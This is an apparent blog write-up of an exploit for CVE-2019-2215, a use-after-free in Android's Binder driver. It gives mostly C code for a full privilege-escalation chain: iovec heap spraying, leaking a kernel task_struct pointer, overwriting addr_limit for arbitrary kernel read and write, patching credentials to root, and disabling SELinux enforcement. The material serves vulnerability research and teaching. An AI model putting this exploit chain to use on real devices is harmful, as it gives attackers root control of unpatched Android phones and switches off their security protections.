exploiting CVE-2019-2215

Brief introduction to binder, eventpoll subsystem and Vectored I/O

Binder is an android-only kernel driver used for Inter Process Communication (IPC). We can interact with Binder through file operations like ioctl(). The other good thing is that /dev/binder is accessible from unprivileged users.

Eventpoll subsystem (also known as epoll) is a scalable I/O event notification mechanism, which basically monitors multiple file descriptors to check what I/O operations can be done to them.
It’s represented in the linux kernel by the eventpoll struct:

struct eventpoll {
	/*
	 * This mutex is used to ensure that files are not removed
	 * while epoll is using them. This is held during the event
	 * collection loop, the file cleanup path, the epoll file exit
	 * code and the ctl operations.
	 */
	struct mutex mtx;

	/* Wait queue used by sys_epoll_wait() */
	wait_queue_head_t wq;

	/* Wait queue used by file->poll() */
	wait_queue_head_t poll_wait;

	/* List of ready file descriptors */
	struct list_head rdllist;

	/* Lock which protects rdllist and ovflist */
	rwlock_t lock;

	/* RB tree root used to store monitored fd structs */
	struct rb_root_cached rbr;

	/*
	 * This is a single linked list that chains all the "struct epitem" that
	 * happened while transferring ready events to userspace w/out
	 * holding ->lock.
	 */
	struct epitem *ovflist;

	/* wakeup_source used when ep_scan_ready_list is running */
	struct wakeup_source *ws;

	/* The user that created the eventpoll descriptor */
	struct user_struct *user;

	struct file *file;

	/* used to optimize loop detection check */
	u64 gen;
	struct hlist_head refs;

#ifdef CONFIG_NET_RX_BUSY_POLL
	/* used to track busy poll napi_id */
	unsigned int napi_id;
#endif

#ifdef CONFIG_DEBUG_LOCK_ALLOC
	/* tracks wakeup nests for lockdep validation */
	u8 nests;
#endif
};

Vectored I/O is a way to write multiple buffers to a big one or read a big buffer into multiple buffers. In Linux / Android kernel we can use stuff like pipes or network sockets (with syscalls like recvmsg()) in order to use Vectored I/O.

An iovec in the kernel is represented by the iovec struct:

struct iovec {
	void *   iov_base;      /* [XSI] Base address of I/O memory region */
	size_t   iov_len;       /* [XSI] Size of region iov_base points to */
};

iov_base points to the buffer with the data and iov_len is the length of the data.

When we read() or write() to an iovec, iov_len amount of data are read from / written to the address stored in iov_base, which is good for exploitation primitive if we’re able to corrupt iov_base pointer. Iovecs also are a pretty good target since we can just allocate a stack of them in the kernel, so we can allocate them in every kmalloc zone we want.

Brief introduction to CVE-2019-2215

Binder has an exit function implemented through ioctl() called BINDER_THREAD_EXIT which frees the binder_thread struct:

static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
  [...]
	switch (cmd) {
	[...]
	case BINDER_THREAD_EXIT:
		binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
			     proc->pid, thread->pid);
		binder_thread_release(proc, thread);
		thread = NULL;
		break;
	[...]
}

static int binder_thread_release(struct binder_proc *proc,
				 struct binder_thread *thread)
{
	struct binder_transaction *t;
	struct binder_transaction *send_reply = NULL;
	int active_transactions = 0;
	struct binder_transaction *last_t = NULL;

	[...]

	if (send_reply)
		binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
	binder_release_work(proc, &thread->todo);
	binder_thread_dec_tmpref(thread);
	return active_transactions;
}

static void binder_thread_dec_tmpref(struct binder_thread *thread)
{
	/*
	 * atomic is used to protect the counter value while
	 * it cannot reach zero or thread->is_dead is false
	 */
	binder_inner_proc_lock(thread->proc);
	atomic_dec(&thread->tmp_ref);
	if (thread->is_dead && !atomic_read(&thread->tmp_ref)) {
		binder_inner_proc_unlock(thread->proc);
		binder_free_thread(thread);
		return;
	}
	binder_inner_proc_unlock(thread->proc);
}

static void binder_free_thread(struct binder_thread *thread)
{
	BUG_ON(!list_empty(&thread->todo));
	binder_stats_deleted(BINDER_STAT_THREAD);
	binder_proc_dec_tmpref(thread->proc);
	put_task_struct(thread->task);
	kfree(thread);
}

Here in binder_free_thread() the kfree() frees the binder_thread struct. The problem comes when a EPOLL_CTL_ADD ioctl is issued before freeing binder_thread struct, in this case an epoll will be added to the waitqueue ( binder_thread->wait), and the binder_thread struct will be added to eppoll_entry’s linked list, now if we call BINDER_THREAD_EXIT, binder_thread struct will be freed, but it isn’t removed from eppoll_entry’s linked list, so if we issue a EPOLL_CTL_DEL ioctl, it’ll access the binder_thread waitqueue, which leads to use-after-free.

Unlink primitive

When we issue the EPOLL_CTL_DEL ioctl many functions are called.
The important function is remove_wait_queue() (notice that wait_queue_head_t *q points to freed waitqueue).

int do_epoll_ctl(int epfd, int op, int fd, struct epoll_event *epds,
		 bool nonblock)
{
	int error;
	int full_check = 0;
	struct fd f, tf;
	struct eventpoll *ep;
	struct epitem *epi;
	struct eventpoll *tep = NULL;

	[...]

	switch (op) {
	[...]
	case EPOLL_CTL_DEL:
		if (epi)
			error = ep_remove(ep, epi);
		else
			error = -ENOENT;
		break;
	[...]

	return error;
}

static int ep_remove(struct eventpoll *ep, struct epitem *epi)
{
	struct file *file = epi->ffd.file;
	struct epitems_head *to_free;
	struct hlist_head *head;

	lockdep_assert_irqs_enabled();

	/*
	 * Removes poll wait queue hooks.
	 */
	ep_unregister_pollwait(ep, epi);

	[...]

	return 0;
}

static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
	struct eppoll_entry **p = &epi->pwqlist;
	struct eppoll_entry *pwq;

	while ((pwq = *p) != NULL) {
		*p = pwq->next;
		ep_remove_wait_queue(pwq);
		kmem_cache_free(pwq_cache, pwq);
	}
}

static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
	wait_queue_head_t *whead;

	rcu_read_lock();
	/*
	 * If it is cleared by POLLFREE, it should be rcu-safe.
	 * If we read NULL we need a barrier paired with
	 * smp_store_release() in ep_poll_callback(), otherwise
	 * we rely on whead->lock.
	 */
	whead = smp_load_acquire(&pwq->whead);
	if (whead)
		remove_wait_queue(whead, &pwq->wait);
	rcu_read_unlock();
}

void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
	unsigned long flags;

	spin_lock_irqsave(&wq_head->lock, flags);
	__remove_wait_queue(wq_head, wq_entry);
	spin_unlock_irqrestore(&wq_head->lock, flags);
}

static inline void
__remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
	list_del(&wq_entry->entry);
}

static inline void list_del(struct list_head *entry)
{
	__list_del(entry->prev, entry->next);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}

static inline void __list_del(struct list_head *prev, struct list_head *next)
{
	next->prev = prev;
	prev->next = next;
}

As we can see __list_del() is called and writes the address of binder_thread->wait.head to binder_thread->wait.task_list.next and binder_thread->wait.task_list.prev.

Leaking task_struct kernel pointer

task_struct_leak() is responsable for leaking the task_struct pointer. At first does preliminary jobs like opening /dev/binder, allocating an epoll and linking it, creating a pipe (which will be used later for reading the leaked address), changing the pipe size to a smaller value since we’ll need to fill it up completely later, a smaller pipe is better, we also mmap() a 0x1000 buffer, and setup the iovecs.

void task_struct_leak() {
    printf("\t[+] opening /dev/binder\n");
    open_binder();

    printf("\t[+] allocating epoll\n");
    epoll_alloc();

    printf("\t[+] linking epoll\n");
    epoll_link();

    printf("\t[+] setting up a pipe\n");
    if( pipe(pipe_fd) ) {
        printf("\t[-] failed to allocate a pipe\n");
        return -1;
    }

    printf("\t[+] changing pipe size to 0x1000\n");
    if (fcntl(READ_PIPE, F_SETPIPE_SZ, PAGE_SIZE) == -1) {
        printf("\t[-] unable to change the pipe capacity\n");
        exit(-1);
    }

    /* used later to unblock the write and avoid deadlocking */
    printf("\t[+] allocating the dummy page\n");
    dummy_page = map_dummy_page();

    if(!dummy_page) {
        printf("\t[-] unable to mmap the dummy page\n");
        exit(-1);
    }

    printf("\t[+] crafting iovecs to leak task_struct\n");
    iovec[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
    iovec[IOVEC_OVERLAP_INDEX].iov_len = PAGE_SIZE;
    iovec[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
    iovec[IOVEC_OVERLAP_INDEX + 1].iov_len = PAGE_SIZE;
    [...]
}

Now the interesting part comes in, we use fork() to create a child process, which will sleep for 2 seconds, in the meanwhile the parent process frees the binder_thread struct, and calls writev(), which will allocate 25 iovecs to make the kernel allocate them in kmalloc-512, since every iovec struct is 16 bytes, we’ll allocate 400 bytes and reallocate the binder_thread struct which is 408 bytes. We only initialize the [10] and [11] ones so that kernel won’t process the other ones, which aren’t useful to exploitation.

pid_t child = fork();
if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    [...]
}

/* free binder_thread struct */
binder_thread_free();

/* reallocates binder_thread with iovecs */
nBytesWritten = writev(WRITE_PIPE, iovec, IOVEC_SIZE);

Now iovecs overlapped binder_thread struct, that’s how it looks like in memory:

iovec_spray

Now let’s try to see what values overlap the binder_thread fields, and why.

iovecs[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
iovecs[IOVEC_OVERLAP_INDEX].iov_len = PAGE_SIZE;
iovecs[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
iovecs[IOVEC_OVERLAP_INDEX + 1].iov_len = PAGE_SIZE;

We set the first iov_base to the mmap()ed page to avoid deadlocking (the address looks like an unlocked lock), we set the corrisponding iov_len field to PAGE_SIZE, which is also the size of the pipe, we did this so that it won’t process the next iovec immediately, but we’ll have to manually read() from the pipe again.

We initialize the other iovec with an invalid address since it’ll be overwritten with a kernel address.

Now the cool part comes in, the child triggers the unlink, so a pointer to binder_thread->wait.head is written to iovec[10].iov_len (which overlapped binder_thread->wait.task_list.next) and to iovec[11].iov_base (which overlapped binder_thread->wait.task_list.prev).

pid_t child = fork();
if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    [...]
    exit(0);
}

void unlink_kptr_write() {
    epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
}

We triggered the unlink, and iovec[11].iov_base and iovec[10].iov_len (I haven’t represented iovec[10].iov_len since it’s not useful to exploitation) have been overwritten with the address of binder_thread->wait.task_list.prev, that’s how it looks like in memory:

unlink_kptr_write

Now the child reads from the pipe, so it’ll process the first valid iovec, which points to the mmap()ed page, we don’t care about this read.

pid_t child = fork();
if (!child) {
    [...]
    /* dummy read */
    nBytesRead = read(READ_PIPE, pipe_read_buffer, sizeof(pipe_read_buffer));
    [...]
}

Now the parent process reads from the pipe again, this time the next iovec will be processed, so it’ll read from iovec[11], but now its iov_base contains a pointer to binder_thread->wait.head, so it’ll read data from there, now that we got the data back in userland we can find our task_struct pointer at offset 0xE8.

nBytesRead = read(READ_PIPE, pipe_read_buffer, sizeof(pipe_read_buffer));

if (nBytesRead != PAGE_SIZE) {
    printf("\t[-] parent failed to read dummy data: 0x%x instead of 0x%x", nBytesRead, PAGE_SIZE);
    exit(-1);
}

/* the task_struct kptr is at offset 0xE8 */
task_struct_kptr = *(uint64_t*)(pipe_read_buffer + PIPE_READ_KPTR_OFFSET);

Note that all macros like READ_PIPE or KREAD_PIPE and WRITE_PIPE or KWRITE_PIPE are just wrappers for the corresponding pipe for reading or writing.

Arbitrary Write

Now it’s time to use the unlink primitive to get an arbitrary write, once we get it, we’ll be able to overwrite addr_limit in task_struct with 0xFFFFFFFFFFFFFFFE (since on ARM64 there’s a check against addr_limit which doesn’t allow to set it to 0xFFFFFFFFFFFFFFFF), so that we can write to the whole memory space (since addr_limit indicates the maximum address that you can write to).

This time we’ll use socketpair() since there’re some technical issues which doesn’t make us able to use pipes to spray iovec array, so we create the socketpair, and write() a random byte (it’s needed for initialization), like the previous stage we create a child process, which sleeps for 2 seconds, in the meanwhile we free binder_thread and spray our iovec array, this time using recvmsg().

/* garbage data */
char garbage_data[] = { 0x41 };

printf("\t[+] setting up a socketpair\n");
if( socketpair(AF_UNIX, SOCK_STREAM, 0, sock_fd) == -1 ) {
    printf("\t[-] failed to create socketpair\n");
    return -1;
}

/* needed to "init" recvmsg() */
printf("\t[+] writing garbage to the socket\n");
nBytesWritten = write(WRITE_SOCK, &garbage_data, sizeof(garbage_data));

if(nBytesWritten != sizeof(garbage_data)) {
    printf("\t[-] write() returned 0x%x instead of 0x%lx\n", nBytesWritten, sizeof(garbage_data));
    exit(-1);
}

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    [...]
}

/* free binder_thread struct which is gonna be reallocated by the child's write() */
binder_thread_free();

struct msghdr message = {0};
message.msg_iov = iovec;
message.msg_iovlen = IOVEC_SIZE;

/* this reallocates the binder_thread struct with our iovecs */
int received_bytes_addr_limit = recvmsg(RECVMSG_SOCK, &message, MSG_WAITALL);

The memory layout will be the same as the one after the spray done by task_struct_leak:

iovec_spray

Now let’s try to see what values overlap the binder_thread fields, and why.

iovecs[IOVEC_OVERLAP_INDEX].iov_base = dummy_page;
iovecs[IOVEC_OVERLAP_INDEX].iov_len = 1;
iovecs[IOVEC_OVERLAP_INDEX + 1].iov_base = (void *) 0x41414141;
iovecs[IOVEC_OVERLAP_INDEX + 1].iov_len = 0x8 + 0x8 + 0x8 + 0x8;
iovecs[IOVEC_OVERLAP_INDEX + 2].iov_base = (void *) 0x42424242;
iovecs[IOVEC_OVERLAP_INDEX + 2].iov_len = 0x8;

As we did before we write the mmap()ed page to the iov_base of the first (valid) iovec to avoid locking issues, the iov_len can be any value, we just place 1 to get a smaller return value from recvmsg() (it returns the sum of all iov_len of valid iovecs), the other two iov_base pointers are set to random addresses because they’ll be overwritten later, but the iov_len fields are so important, the second one has to be 0x8 + 0x8 + 0x8 + 0x8, we’ll see later why, the last one is set to 0x8 since it’s gonna be the size of the arbitrary write, since we’re gonna write a kernel pointer (which is 8 bytes long), 0x8 is the right size.

Now that we sprayed our iovec array, the child triggers the unlink as we did in the previous stage, so that iovec[11].iov_base points to iovec[10].iov_len.

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    [...]
}

The memory layout will be the same as the one after the unlink done by task_struct_leak:

unlink_kptr_write

Now the child calls write() passing final_sock_data as data to send.

pid_t child = fork();

if (!child) {
    /* used to avoid race conditions */
    sleep(2);
    unlink_kptr_write();
    nBytesWritten = write(WRITE_SOCK, final_sock_data, sizeof(final_sock_data));
    [...]
}

Let’s look at what data are sent through write():

unsigned long final_sock_data[] = {
						0x1,                                        // iovec[IOVEC_OVERLAP_INDEX].iov_len
            0x41414141,                                 // iovec[IOVEC_OVERLAP_INDEX + 1].iov_base
            0x8 + 0x8 + 0x8 + 0x8,                      // iovec[IOVEC_OVERLAP_INDEX + 1].iov_len
            task_struct_kptr + ADDR_LIMIT_OFFSET,       // iovec[IOVEC_OVERLAP_INDEX + 2].iov_base
            0x8,                                        // iovec[IOVEC_OVERLAP_INDEX + 2].iov_len
            0xFFFFFFFFFFFFFFFE                          // addr_limit value to write
};

Now that we called write() the kernel will start processing all the valid iovecs, the first one is iovec[10], this will just write a byte to the mmap()ed page, it’s not important, we just do that because we have to process the next one after it has been corrupted by the unlink. Now we’ll process iovec[11], but if you remember we corrupted its iov_base with a pointer to iovec[10].iov_len, so it’ll write 0x20 (since we set iovec[11].iov_len to 0x8 + 0x8 + 0x8 + 0x8) from final_sock_data to iovec[10].iov_len.

As result we’re able to overwrite iovec[12].iov_base to an arbitrary address, in this case the address of addr_limit.

iovec_processing_11

Now that the kernel finished processing iovec[11], it’ll start processing iovec[12], but as I said we just overwrote its iov_base with the address of addr_limit, so it’s gonna write iov_len (0x8) bytes from the remaining data from final_sock_data to addr_limit, in this case 0xFFFFFFFFFFFFFFFE!

We can easily check if all the writes have been done without issues just by checking the return value of write() and recvmsg(), if write() returns the size of final_sock_data, and recvmsg() returns the sum of all the iov_len of the valid iovecs.

pid_t child = fork();
if (!child) {
    [...]
    nBytesWritten = write(WRITE_SOCK, final_sock_data, sizeof(final_sock_data));

    /* ensures that the write has been correctly done */
    if (nBytesWritten != sizeof(final_sock_data)) {
        printf("\t[-] write() returned 0x%x instead of 0x%lx\n", nBytesWritten, sizeof(final_sock_data));
        exit(-1);
    }
    exit(0);
}
[...]
int expected_bytes_addr_limit = iovec[IOVEC_OVERLAP_INDEX].iov_len +
                                iovec[IOVEC_OVERLAP_INDEX + 1].iov_len +
                                iovec[IOVEC_OVERLAP_INDEX + 2].iov_len;

if(received_bytes_addr_limit != expected_bytes_addr_limit) {
    printf("\t[-] recvmsg() wasn't able to overwrite addr_limit: returned 0x%x instead of 0x%x\n", received_bytes_addr_limit, expected_bytes_addr_limit);
    exit(-1);
}

Stable arbitrary kernel r/w

Now that we overwrote addr_limit, getting arbitrary kernel r/w is as easy as using pipes :p

We obviously create a new pair of pipes for reading and writing to arbitrary addresses, after that the journey is easy. For arbitrary write we just need to write() the data we wanna write to the pipe, and read() the data back to the kernel address we wanna write to.

int kwrite(uint64_t kaddr, void* user_value, size_t size) {
    /* doing this to avoid possible issues */
    if(size > 0x1000) {
        printf("\t[-] writing more than a kernel page can cause issues\n");
    }
    /* writes user's value to pipe */
    if( write(KWRITE_PIPE, user_value, size) == -1 ) {
        printf("\t[-] failed to write the value to the pipe\n");
        return -1;
    }
    /* writes the user's value we wrote to the pipe to the kaddr */
    if( read(KREAD_PIPE, (void*)kaddr, size) == -1 ) {
        printf("\t[-] failed to write to kernel memory\n");
        return -1;
    }
    return 0;
}

For the arbitrary read it’s exactly the opposite, we just need to write() the kernel address we wanna read from to the pipe, and read() back to the userland buffer.

int kread(uint64_t kaddr, void *user_value, size_t size) {
    /* doing this to avoid possible issues */
    if(size > 0x1000) {
        printf("\t[-] reading more than a kernel page can cause issues\n");
    }
    /* writes kernel data to pipe */
    if( write(KWRITE_PIPE, (void*)kaddr, size) != size ) {
        printf("\t[-] failed to read kernel data\n");
        return -1;
    }
    /* writes the value we wrote to the pipe to the kaddr */
    if( read(KREAD_PIPE, user_value, size) != size ) {
        printf("\t[-] failed to copy data to userspace\n");
        return -1;
    }
    return 0;
}

Getting root privileges

Now that we can write to every address in the address space, we can overwrite the kernel cred struct to make it like init_cred (which represents the first task in Linux).

struct cred init_cred = {
	.usage			= ATOMIC_INIT(4),
#ifdef CONFIG_DEBUG_CREDENTIALS
	.subscribers		= ATOMIC_INIT(2),
	.magic			= CRED_MAGIC,
#endif
	.uid			= GLOBAL_ROOT_UID,
	.gid			= GLOBAL_ROOT_GID,
	.suid			= GLOBAL_ROOT_UID,
	.sgid			= GLOBAL_ROOT_GID,
	.euid			= GLOBAL_ROOT_UID,
	.egid			= GLOBAL_ROOT_GID,
	.fsuid			= GLOBAL_ROOT_UID,
	.fsgid			= GLOBAL_ROOT_GID,
	.securebits		= SECUREBITS_DEFAULT,
	.cap_inheritable	= CAP_EMPTY_SET,
	.cap_permitted		= CAP_FULL_SET,
	.cap_effective		= CAP_FULL_SET,
	.cap_bset		= CAP_FULL_SET,
	.user			= INIT_USER,
	.user_ns		= &init_user_ns,
	.group_info		= &init_groups,
	.ucounts		= &init_ucounts,
};

Luckily for us a pointer to cred struct is stored inside task_struct so we can just read it with kread64() and then write to each member of the struct (using the releative offsets) with values from init_cred.

void kernel_cred_patch() {
    printf("\t[+] reading cred pointer from task_struct\n");
    cred_kptr = kread64(task_cred_kptr);

    /* basically commit_cred(prepare_kernel_cred(0)); */
    kwrite32(cred_kptr + CRED_UID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_GID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_SUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_SGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_EUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_EGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_FSUID_OFFSET, GLOBAL_ROOT_UID);
    kwrite32(cred_kptr + CRED_FSGID_OFFSET, GLOBAL_ROOT_GID);
    kwrite32(cred_kptr + CRED_SECUREBITS_OFFSET, SECUREBITS_DEFAULT);
    kwrite64(cred_kptr + CRED_CAP_INHERITABLE_OFFSET, CAP_EMPTY_SET);
    kwrite64(cred_kptr + CRED_CAP_PERMITTED_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_EFFECTIVE_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_BSET_OFFSET, CAP_FULL_SET);
    kwrite64(cred_kptr + CRED_CAP_AMBIENT_OFFSET, CAP_EMPTY_SET);
}

Disable SELinux enforcement

Now that we got root privileges we need to disable SELinux enforcement, that’s achivable by overwriting a global int called selinux_enforcing to 0, but we need the kernel base to know where the kernel starts then we can just find selinux_enforcing by using the relative offset (which may change between devices and versions).

void disable_selinux_enforcing() {
    printf("\t[+] reading init_nsproxy pointer from task_struct\n");
    init_nsproxy_kptr = kread64(task_init_nsproxy_kptr);

    kbase = init_nsproxy_kptr - SYMBOL_OFFSET_INIT_NSPROXY;
    printf("\t[+] kernel base: 0x%lx\n", kbase);

    uint64_t selinux_enforcing_kptr = kbase + SYMBOL_OFFSET_SELINUX_ENFORCING;
    int ret = kread32(selinux_enforcing_kptr);
    if( ret && ret != -1 ) {
        printf("\t[+] SELinux enforcing is enabled\n");
        if( !kwrite32(selinux_enforcing_kptr, 0x0) ) {
            printf("\t[+] successfully disabled SELinux enforcing\n");
        }
    } else if(ret == 0) {
        printf("\t[+] SELinux enforcing is disabled\n");
    }
}

Credits

Thanks to HackSysTeam for the android kernel exploitation workshop, SpecterDev for his writeup about the same vulnerability, and Maddie Stone for the original writeup.
You can find my exploit implementation here.